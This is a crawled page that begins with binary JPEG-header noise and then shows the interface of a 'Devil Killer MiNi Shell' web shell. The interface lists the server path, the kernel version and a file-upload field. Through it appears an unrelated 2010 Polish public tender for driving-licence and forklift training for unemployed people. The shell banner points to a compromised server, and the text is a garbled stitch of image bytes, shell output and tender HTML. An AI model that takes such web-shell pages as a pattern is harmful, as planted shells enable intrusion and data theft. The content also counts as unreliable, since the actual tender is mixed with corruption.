JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100819/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100819/256770-N-2010.html

<p class="kh_header"><b>Maków Mazowiecki: Organizacja i przeprowadzenie szkoleń grupowych dla osób bezrobotnych w ramach środków z Europejskiego Funduszu Społecznego w zakresie:

1. Prawo jazdy kategorii C
2. Prawo jazdy kategorii E (do kategorii C)
3. Wózki jezdniowe z napędem silnikowym wraz z uprawnieniami w zakresie bezpiecznej obsługi i wymiany butli gazowych wyposażonych w te urządzenia</b><br>
<b>Numer ogłoszenia: 256770 - 2010; data zamieszczenia: 19.08.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowy Urząd Pracy , ul. Przasnyska 77, 06-200 Maków Mazowiecki, woj. mazowieckie, tel. 029 7172782, faks 029 7172782.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pupmakow.eur.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Organizacja i przeprowadzenie szkoleń grupowych dla osób bezrobotnych w ramach środków z Europejskiego Funduszu Społecznego w zakresie:

1. Prawo jazdy kategorii C
2. Prawo jazdy kategorii E (do kategorii C)
3. Wózki jezdniowe z napędem silnikowym wraz z uprawnieniami w zakresie bezpiecznej obsługi i wymiany butli gazowych wyposażonych w te urządzenia.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest organizacja i przeprowadzenie szkoleń grupowych dla osób bezrobotnych współfinasowanych przez Unię Europejską w ramach Europejskiego Funduszu Społecznego odpowiednio od jednej do trzech części zamówienia:

Część 1 
Prawo jazdy kategorii C
Część 2 
Prawo jazdy kategorii E (do kategorii C)
Część 3
Wózki jezdniowe z napędem silnikowym wraz z uprawnieniami w zakresie bezpiecznej obsługi i wymiany butli gazowych wyposażonych w te urządzenia

Usługa jest współfinansowana ze środków Europejskiego Funduszu Społecznego Program Operacyjny Kapitał Ludzki Priorytet VI Rynek pracy otwarty dla wszystkich Działanie 6.1 Poprawa dostępu do zatrudnienia oraz wspieranie aktywności zawodowej w regionie Poddziałanie 6.1.3 Poprawa zdolności do zatrudnienia oraz podnoszenie poziomu aktywności zawodowej osób bezrobotnych tytuł projektu: Rynek pracy bez barier

Część  I
Przeprowadzenie szkolenia dla 60 osób bezrobotnych w zakresie Prawo jazdy kat. C współfinasowanego przez Unię Europejską w ramach Europejskiego Funduszu Społecznego

Program szkolenia zgodny z Rozporządzeniem Ministra Infrastruktury z dnia 27 października 2005r. w sprawie szkolenia, egzaminowania i uzyskiwania uprawnień przez kierujących pojazdami, instruktorów i egzaminatorów (Dz. U. z 2005r. nr 217, poz. 1834 ze zm.).
Ramowy program kursu:
- przepisy ruchu drogowego, 
- technika kierowania pojazdem, 
- czynności kontrolno-obsługowe,
- zasady przewozu osób i ładunków, 
- przedlekarska pomoc,
- praktyczna nauka jazdy.
Ogółem: 65 godzin, w tym: 
- Warsztaty aktywnego poszukiwania pracy - 15 godzin,
Warsztaty aktywnego poszukiwania pracy mają być przeprowadzone przez trenera z wykształceniem wyższym w kierunku: psychologia, socjologia, pedagogika lub podobnym z udokumentowanym doświadczeniem w prowadzeniu zajęć ww typu. Mile widziany doradca zawodowy lub Lider Klubu Pracy. Zajęcia obejmą następujące moduły: aktywne poszukiwanie pracy, trening interpersonalny, autoprezentacja, asertywność, komunikacja interpersonalna.
- część teoretyczna - 20 godzin, 
- część praktyczna - 30 godzin.

Wykonawca zobowiązany jest do realizacji szkolenia zgodnie z przepisami:
- Prawo o ruchu drogowym z dnia 20 czerwca 1997r. (tekst jednolity Dz. U. z 2005r. Nr 108, poz. 908 z późn. zm.),
- Ustawa z dnia 6 września 2001 r. o transporcie drogowym (tekst jedn. Dz. U. 2007r. Nr 125 poz. 874 ze zm.),
- Rozporządzenie Ministra Infrastruktury z dnia 27 października 2005r. w sprawie szkolenia, egzaminowania i uzyskiwania uprawnień przez kierujących pojazdami, instruktorów i egzaminatorów (Dz. U. z 2005r. Nr 217, poz. 1834 z późn. zm.),
- Rozporządzenie Ministra Infrastruktury z dnia 10 kwietnia 2008 r. w sprawie wymagań dotyczących prowadzenia ośrodka doskonalenia techniki jazdy, postępowania z dokumentacją związaną z prowadzeniem szkoleń oraz wzorów stosowanych dokumentów (Dz. U. z 2008r. Nr 77, poz. 458),
- Rozporządzenia Ministra Infrastruktury z dnia 31 grudnia 2002 r. w sprawie warunków technicznych pojazdów oraz zakresu ich niezbędnego wyposażenia (Dz. U. z 2003r. Nr 32 poz. 262 ze zm.).
W cenie należy uwzględnić koszt egzaminu państwowego.
Szkolenie należy przeprowadzić na terenie miasta Makowa Mazowieckiego.
Wykonawca poinformuje uczestników szkolenia z odpowiednim wyprzedzeniem czasowym o wszystkich sprawach organizacyjnych związanych z egzaminem państwowym na kategorię C prawa jazdy.
Wykonawca w terminie do 7 dni od dnia zakończenia kursu na prawo jazdy kategorii C, dokona w imieniu uczestnika szkolenia jednokrotnej przedpłaty tytułem państwowego egzaminu na prawo jazdy kategorii C z części teoretycznej w Wojewódzkim Ośrodku Ruchu Drogowego (zwanym dalej WORD). Po uzyskaniu przez uczestnika szkolenia pozytywnego wyniku egzaminu państwowego z części teoretycznej, Wykonawca dokona jednokrotnej przedpłaty za egzamin państwowy z części praktycznej.
Wykonawca po dokonaniu jednokrotnej opłaty egzaminacyjnej za egzamin państwowy na prawo jazdy kategorii C (teoretyczny i praktyczny) poinformuje pisemnie Zamawiającego, za kogo została dokonana opłata (przekaże listę osób z wyszczególnieniem wyników z egzaminu teoretycznego i praktycznego) oraz przedłoży dowód dokonania opłaty.
Zaświadczenie o ukończeniu szkolenia powinno być opatrzone w logo Programu Operacyjnego Kapitał Ludzki oraz Unii Europejskiej z odwołaniem słownym do Unii Europejskiej i Europejskiego Funduszu Społecznego.
Wykonawca zobowiązany jest do umieszczenia informacji o współfinansowaniu szkolenia ze środków Unii Europejskiej w ramach EFS, zgodnie z dokumentem Wytyczne dotyczące oznaczenia projektów w ramach POKL  (logo Programu Operacyjnego Kapitał Ludzki, logo Unii Europejskiej z  odwołaniem słownym do Unii Europejskiej i Europejskiego Funduszu Społecznego powinno zostać umieszczone na wszystkich dokumentach i materiałach szkoleniowych związanych z organizacją szkolenia, w tym również w miejscu realizacji szkolenia powinna być zastosowana zasada wizualizacji). 

Część II
Przeprowadzenie szkolenia dla 30 osób bezrobotnych w zakresie Prawo jazdy kat. E (do kategorii C) współfinasowanego przez Unię Europejską w ramach Europejskiego Funduszu Społecznego
Program szkolenia zgodny z Rozporządzeniem Ministra Infrastruktury z dnia 27 października 2005r. w sprawie szkolenia, egzaminowania i uzyskiwania uprawnień przez kierujących pojazdami, instruktorów i egzaminatorów (Dz.U. z 2005r. nr 217, poz. 1834 ze zm.).
Program szkolenia musi obejmować następujące zagadnienia:
- zasady ruchu drogowego,
- porządek i bezpieczeństwo ruchu na drodze, czas pracy kierowcy,
- technika kierowania pojazdem i zasady bhp przy transporcie ładunków,
- pierwsza pomoc i zasady postępowania razie uczestnictwa w wypadku drogowym,
- zajęcia praktyczne,
- egzamin. 
Liczba godzin szkolenia ogółem: 60 godzin, w tym  
- Warsztaty aktywnego poszukiwania pracy - 15 godzin,
Warsztaty aktywnego poszukiwania pracy mają być przeprowadzone przez trenera z wykształceniem wyższym w kierunku: psychologia, socjologia, pedagogika lub podobnym z udokumentowanym doświadczeniem w prowadzeniu zajęć ww typu. Mile widziany doradca zawodowy lub Lider Klubu Pracy. Zajęcia obejmą następujące moduły: aktywne poszukiwanie pracy, trening interpersonalny, autoprezentacja, asertywność, komunikacja interpersonalna.
- część teoretyczna -  20 godzin, 
- część praktyczna -   25 godzin.
Wykonawca zobowiązany jest do realizacji szkolenia zgodnie z przepisami:
- Prawo o ruchu drogowym z dnia 20 czerwca 1997r. (tekst jednolity Dz. U. z 2005r. Nr 108, poz. 908 z późn. zm.),
- Ustawa z dnia 6 września 2001 r. o transporcie drogowym (tekst jedn. Dz. U. 2007r. Nr 125 poz. 874 ze zm.),
- Rozporządzenie Ministra Infrastruktury z dnia 27 października 2005r. w sprawie szkolenia, egzaminowania i uzyskiwania uprawnień przez kierujących pojazdami, instruktorów i egzaminatorów (Dz. U. z 2005r. Nr 217, poz. 1834 z późn. zm.),
- Rozporządzenie Ministra Infrastruktury z dnia 10 kwietnia 2008 r. w sprawie wymagań dotyczących prowadzenia ośrodka doskonalenia techniki jazdy, postępowania z dokumentacją związaną z prowadzeniem szkoleń oraz wzorów stosowanych dokumentów (Dz. U. z 2008r. Nr 77, poz. 458),
- Rozporządzenia Ministra Infrastruktury z dnia 31 grudnia 2002 r. w sprawie warunków technicznych pojazdów oraz zakresu ich niezbędnego wyposażenia (Dz. U. z 2003r. Nr 32 poz. 262 ze zm.).
Zamawiający skieruje na szkolenie osoby bezrobotne zarejestrowane w Powiatowym Urzędzie Pracy w Makowie Mazowieckim.
Cel szkolenia: teoretyczne i praktyczne przygotowanie uczestników do przystąpienia do egzaminu państwowego na uzyskanie uprawnień w zakresie prawa jazdy kategorii E do kategorii C.
Szkolenie ma zakończyć się egzaminem wewnętrznym (egzamin wewnętrzny w dniu odbywania się ostatniej jazdy). 
Szkolenie musi odbywać się na terenie miasta Makowa Mazowieckiego.
W formularzu ofertowym należy wskazać dokładny adres realizacji zajęć teoretycznych.
Szkolenie prowadzone będzie w jednej grupie. Zamawiający wymaga, aby szkolenie odbywało się w kolejno następujących po sobie dniach powszednich,  po 8 godzin zegarowych maksymalnie dziennie dla jednego uczestnika, w godzinach między 8:00 a 16:00. Obowiązek przeprowadzenia szkolenia w dni powszednie oznacza, że niedopuszczalne jest zaplanowanie i prowadzenie zajęć w sobotę, niedzielę oraz dni ustawowo wolne od pracy. 

Wykonawca powinien zapewnić każdemu uczestnikowi szkolenia niezbędne materiały szkoleniowe i dydaktyczne (zgodne z aktualnym stanem prawnym). Wykonawca zapewni każdemu uczestnikowi szkolenia: teczkę na materiały dydaktyczne, długopis, zeszyt bądź notatnik oraz materiały dydaktyczne niezbędne do utrwalenia wiadomości w celu pozytywnego zdania egzaminu, mogą to być np. podręczniki, kserokopie treści przekazywanych w trakcie zajęć szkoleniowych.
Materiały szkoleniowe opracowane przez Wykonawcę stanowić powinny rozwinięcie zagadnień objętych programem szkolenia, w sposób przystępny przedstawiać praktyczne informacje ułatwiające uczestnikom szkolenia przyswajanie wiedzy.
Materiały szkoleniowe mogą stanowić również gotowe publikacje dostępne na rynku. Nie mogą zawierać zapożyczeń z prac osób trzecich oraz nie mogą naruszać praw przysługujących osobom trzecim, w szczególności praw autorskich tych osób. Wszystkie materiały muszą być przygotowane i rozdane uczestnikom szkolenia w pierwszym dniu szkolenia. Po zakończeniu szkolenia materiały dydaktyczne przechodzą na własność każdego uczestnika.
Zaświadczenia o ukończeniu szkolenia muszą być opracowane zgodnie z Rozporządzeniem Ministra Edukacji i Nauki z dnia 3 lutego 2006 r. w sprawie uzyskania i uzupełnienia przez osoby dorosłe wiedzy ogólnej, umiejętności i kwalifikacji zawodowych w formach pozaszkolnych (Dz. U. z 2006 r. Nr 31, poz. 216)  Zaświadczenie o ukończeniu szkolenia powinno być opatrzone w logo Programu Operacyjnego Kapitał Ludzki oraz Unii Europejskiej z odwołaniem słownym do Unii Europejskiej i Europejskiego Funduszu Społecznego.
Wykonawca zobowiązany jest do umieszczenia informacji o współfinansowaniu szkolenia ze środków Unii Europejskiej w ramach EFS, zgodnie z dokumentem Wytyczne dotyczące oznaczenia projektów w ramach POKL  (logo Programu Operacyjnego Kapitał Ludzki, logo Unii Europejskiej z  odwołaniem słownym do Unii Europejskiej i Europejskiego Funduszu Społecznego powinno zostać umieszczone na wszystkich dokumentach i materiałach szkoleniowych związanych z organizacją szkolenia, w tym również w miejscu realizacji szkolenia powinna być zastosowana zasada wizualizacji). 

Część III
Przeprowadzenie szkolenia dla 30 osób bezrobotnych w zakresie Wózki jezdniowe z napędem silnikowym wraz z uprawnieniami w zakresie bezpiecznej obsługi i wymiany butli gazowych wyposażonych w te urządzenia współfinasowanego przez Unię Europejską w ramach Europejskiego Funduszu Społecznego
Program szkolenia zgodny z Rozporządzeniem Ministra Infrastruktury z dnia 27 października 2005r. w sprawie szkolenia, egzaminowania i uzyskiwania uprawnień przez kierujących pojazdami, instruktorów i egzaminatorów (Dz.U. z 2005r. nr 217, poz. 1834 ze zm.).
Program szkolenia musi obejmować następujące zagadnienia:
- typy stosowanych wózków jezdniowych,
- budowa wózka,
- czynności operatora przy obsłudze wózków przed podjęciem pracy i po pracy wózkiem,
- czynności operatora w czasie pracy wózkiem, 
- wiadomości z zakresu ładunkoznawstwa, 
- wiadomości z zakresu bezpieczeństwa i higieny pracy, przepisów ppoż., 
- praktyczna nauka jazdy i manewrowania osprzętem wózków,
- wiadomości o dozorze technicznym, 
- bezpieczna obsługa i wymiana butli gazowej,
- oraz dodatkowo zagadnienia z zakresu ochrony środowiska.
Liczba godzin szkolenia ogółem: 82 godziny, w tym:
- Warsztaty aktywnego poszukiwania pracy - 15 godzin,
Warsztaty aktywnego poszukiwania pracy mają być przeprowadzone przez trenera z wykształceniem wyższym w kierunku: psychologia, socjologia, pedagogika lub podobnym z udokumentowanym doświadczeniem w prowadzeniu zajęć ww typu. Mile widziany doradca zawodowy lub Lider Klubu Pracy. Zajęcia obejmą następujące moduły: aktywne poszukiwanie pracy, trening interpersonalny, autoprezentacja, asertywność, komunikacja interpersonalna.
- część teoretyczna -  40 godzin, 
- część praktyczna -   27 godzin.
Zamawiający skieruje na szkolenie osoby bezrobotne zarejestrowane w Powiatowym Urzędzie Pracy w Makowie Mazowieckim.
Cel szkolenia: teoretyczne i praktyczne przygotowanie uczestników do samodzielnego obsługiwania wózków jezdniowych. Szkolenie ma zakończyć się egzaminem państwowym przed Urzędem Dozoru Technicznego (egzamin w ostatnim dniu zajęć edukacyjnych). 
Szkolenie musi odbywać się na terenie miasta Makowa Mazowieckiego.
W formularzu ofertowym należy wskazać dokładny adres realizacji zajęć teoretycznych i praktycznych.
Szkolenie prowadzone będzie w grupach nie większych niż 3 osoby. Czas szkolenia praktycznego grupowego dla grupy 3 osobowej można liczyć jednocześnie dla wszystkich 3 uczestników, pod warunkiem iż osoby aktualnie nie jeżdżące wózkiem, obserwują wykonywane manewry, odnotowując popełnione błędy.
Wykonawca powinien zapewnić każdemu uczestnikowi szkolenia niezbędne materiały szkoleniowe i dydaktyczne (zgodne z aktualnym stanem prawnym). Wykonawca zapewni każdemu uczestnikowi szkolenia: teczkę na materiały dydaktyczne, długopis, zeszyt bądź notatnik oraz materiały dydaktyczne niezbędne do utrwalenia wiadomości w celu pozytywnego zdania egzaminu, mogą to być np. podręczniki, kserokopie treści przekazywanych w trakcie zajęć szkoleniowych.
Materiały szkoleniowe opracowane przez Wykonawcę stanowić powinny rozwinięcie zagadnień objętych programem szkolenia, w sposób przystępny przedstawiać praktyczne informacje ułatwiające uczestnikom szkolenia przyswajanie wiedzy.
Materiały szkoleniowe mogą stanowić również gotowe publikacje dostępne na rynku. Nie mogą zawierać zapożyczeń z prac osób trzecich oraz nie mogą naruszać praw przysługujących osobom trzecim, w szczególności praw autorskich tych osób.
Wszystkie materiały muszą być przygotowane i rozdane uczestnikom szkolenia w pierwszym dniu szkolenia. Po zakończeniu szkolenia materiały dydaktyczne przechodzą na własność każdego uczestnika.
Zaświadczenie o ukończeniu szkolenia musi być opracowane zgodnie z Rozporządzeniem Ministra Edukacji i Nauki z dnia 3 lutego 2006 r. w sprawie uzyskania i uzupełnienia przez osoby dorosłe wiedzy ogólnej, umiejętności i kwalifikacji zawodowych w formach pozaszkolnych (Dz. U. z 2006 r. Nr 31, poz. 216) Zaświadczenie o ukończeniu szkolenia powinno być opatrzone w logo Programu Operacyjnego Kapitał Ludzki oraz Unii Europejskiej z odwołaniem słownym do Unii Europejskiej i Europejskiego Funduszu Społecznego.  
Wykonawca zobowiązany jest do umieszczenia informacji o współfinansowaniu szkolenia ze środków Unii Europejskiej w ramach EFS, zgodnie z dokumentem Wytyczne dotyczące oznaczenia projektów w ramach POKL  (logo Programu Operacyjnego Kapitał Ludzki, logo Unii Europejskiej z odwołaniem słownym do Unii Europejskiej i Europejskiego Funduszu Społecznego powinno zostać umieszczone na wszystkich dokumentach i materiałach szkoleniowych związanych z organizacją szkolenia, w tym również w miejscu realizacji szkolenia powinno być zastosowana zasada wizualizacji)..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.41.12.00-0, 80.53.00.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.10.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Nie jest wymagane</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki, dotyczące:
a) posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania;
- Wpis do rejestru instytucji szkoleniowych prowadzonego przez Wojewódzki Urząd
Pracy właściwy ze względu na siedzibę instytucji szkoleniowej (zgodnie z ustawą o
promocji zatrudnienia i instytucjach rynku pracy - Tekst jed. Dz. U. Nr 69 poz. 415
z 2008r. z późn. zm. oraz Rozporządzeniem Ministra Gospodarki i Pracy z dnia 27
października 2004r. w sprawie rejestru instytucji szkoleniowych Dz. U. Nr 236, poz. 2365), oraz dokument, że wpis został zaktualizowany na rok 2010;
- aktualny wpis do rejestru przedsiębiorców prowadzących ośrodki szkolenia zgodnie z art. 39g ustawy z dnia 6 września 2001 r. o transporcie drogowym (tekst jedn. Dz. U. z 2007r. Nr 125 poz. 874 z późn. zm.) dla pierwszej i drugiej części zamówienia;
- zaświadczenie o wpisie do rejestru przedsiębiorców prowadzących ośrodki szkolenia kierowców zgodnie z art. 103 ustawy Prawo o ruchu drogowym z dnia 20 czerwca 1997r. (tekst jednolity Dz. U. z 2005r. Nr 108, poz. 908 z późn. zm.), dla pierwszej i drugiej części zamówienia;
Ocena spełnienia warunku będzie dokonywana metodą 0 - 1, tj. spełnia, nie spełnia, w oparciu o wpis do rejestru instytucji szkoleniowych prowadzonego przez wojewódzki urząd pracy właściwy ze względu na siedzibę instytucji szkoleniowej (zgodnie z ustawą o promocji zatrudnienia i instytucjach rynku pracy - Tekst jed. Dz. U. Nr 69 poz. 415 z 2008r. z późn. zm.), oraz oświadczenie Wykonawcy dołączone do oferty stanowiące załącznik nr 2 do SIWZ odpowiednio od jednej do trzech części zamówienia, a także wwym. dokumenty potwierdzające posiadanie uprawnień do przeprowadzania poszczególnych kursów dla pierwszej i drugiej części zamówienia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wymaga się przeprowadzenia przynajmniej dwóch szkoleń grupowych o tematyce tożsamej z przedmiotem zamówienia, w okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie, licząc wstecz od dnia upływu terminu składania ofert. Wykonawca musi udokumentować, że wymieniona usługa została należycie wykonana załączając dokumenty potwierdzające ich należytą realizację, w wykazie podać nazwę kierunku szkolenia, ilość przeszkolonych osób, nazwę odbiorcy szkolenia (adres, telefon), termin (y) realizacji szkolenia (ń) (dzień, miesiąc, rok). Ocena spełnienia warunku będzie dokonywana metodą 0 - 1, tj. spełnia, nie spełnia. W oparciu o wykaz zrealizowanych usług Wykonawcy potwierdzone oświadczeniem stanowiącym załącznik nr 4 do SIWZ oraz oświadczenia uprzednich odbiorców o ich należytym wykonaniu, potwierdzonego odpowiednimi dokumentami, a także oświadczenie Wykonawcy dołączone do oferty stanowiące załącznik nr 2 do SIWZ, odpowiednio od jednej do trzech części zamówienia; W przypadku rozbieżności pomiędzy nazwą szkolenia wskazaną w SIWZ a nazwą w załączniku nr 4, w ocenie doświadczenia będą uwzględnione te szkolenia w których Wykonawca wykaże, że program tematyczny zrealizowanych przez niego zamówień obejmował przynajmniej 70% minimum programowego wskazanego w przedmiocie zamówienia odpowiednio od jednej do trzech części zamówienia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca wykaże, że dysponuje dla Części I i II co najmniej trzema samochodami ciężarowymi i placem manewrowym do prowadzenia zajęć praktycznych, dla Części III co najmniej dwoma wózkami jezdniowymi.
Ocena spełnienia warunku będzie dokonywana metodą 0 - 1, tj. spełnia, nie spełnia, w oparciu o oświadczenie Wykonawcy dołączone do oferty stanowiące załącznik nr 2 do SIWZ, odpowiednio od jednej do trzech części zamówienia;</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca wykaże, że dysponuje lub będzie dysponował co najmniej 9 osobami, które będą uczestniczyć w wykonaniu zamówienia, w tym:
- do przeprowadzenia zajęć teoretycznych dla Części I i II wymaga się 2 osób, które posiadają wykształcenie wyższe i przygotowanie pedagogiczne, dla Części III wykonawca wykaże, że będzie dysponował 1 osobą, która posiada wykształcenie wyższe mechaniczne i przygotowanie pedagogiczne,
- do przeprowadzenia zajęć praktycznych dla Części I i II wymaga się 4 osób, które posiadają wykształcenie wyższe lub średnie oraz kurs instruktora nauki jazdy samochodem ciężarowym, dla  Części III wymaga się 2 osób, które posiadają wykształcenie wyższe lub średnie oraz kurs obsługi wózków jezdniowych.
Ocena spełnienia warunku będzie dokonywana metodą 0 - 1, tj. spełnia, nie spełnia, w oparciu o oświadczenie Wykonawcy dołączone do oferty stanowiące załącznik nr 2 do SIWZ, odpowiednio od jednej do trzech części zamówienia;</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunku będzie dokonywana metodą 0 - 1, tj. spełnia, nie spełnia,
w oparciu o oświadczenie Wykonawcy dołączone do oferty stanowiące załącznik nr 2 do SIWZ, odpowiednio od jednej do trzech części zamówienia;</p>
</li></ul></li></ul>
